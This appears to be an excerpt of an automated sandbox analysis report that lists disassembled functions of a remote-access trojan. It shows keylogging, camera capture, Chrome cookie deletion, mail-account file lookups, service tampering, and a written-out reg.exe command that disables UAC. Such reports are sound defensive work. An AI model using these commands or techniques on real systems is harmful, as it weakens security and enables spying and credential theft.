                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                Strings
                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                • UserProfile, xrefs: 0040BAE8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                • API String ID: 2018770650-304995407
                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                • __allrem.LIBCMT ref: 0043ACE9
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                • __allrem.LIBCMT ref: 0043AD1C
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                • __allrem.LIBCMT ref: 0043AD51
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prologSleep
                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                • API String ID: 3469354165-3054508432
                                                • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe
                                                • String ID:
                                                • API String ID: 4189289331-0
                                                • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _strlen.LIBCMT ref: 10001607
                                                • _strcat.LIBCMT ref: 1000161D
                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                • String ID:
                                                • API String ID: 1922816806-0
                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$AttributesFilelstrcat
                                                • String ID:
                                                • API String ID: 3594823470-0
                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                Function 0041AD09 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                • String ID:
                                                • API String ID: 493672254-0
                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                • _free.LIBCMT ref: 10005B2D
                                                • _free.LIBCMT ref: 10005B55
                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                • _abort.LIBCMT ref: 10005B74
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • _free.LIBCMT ref: 004482CC
                                                • _free.LIBCMT ref: 004482F4
                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • _abort.LIBCMT ref: 00448313
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                • API String ID: 4036392271-1520055953
                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                • wsprintfW.USER32 ref: 0040B22E
                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EventLocalTimewsprintf
                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                • API String ID: 1497725170-248792730
                                                • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleSizeSleep
                                                • String ID: XQG
                                                • API String ID: 1958988193-3606453820
                                                • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                • String ID: 0$MsgWindowClass
                                                • API String ID: 2877667751-2410386613
                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                Strings
                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                Memory Dump Source
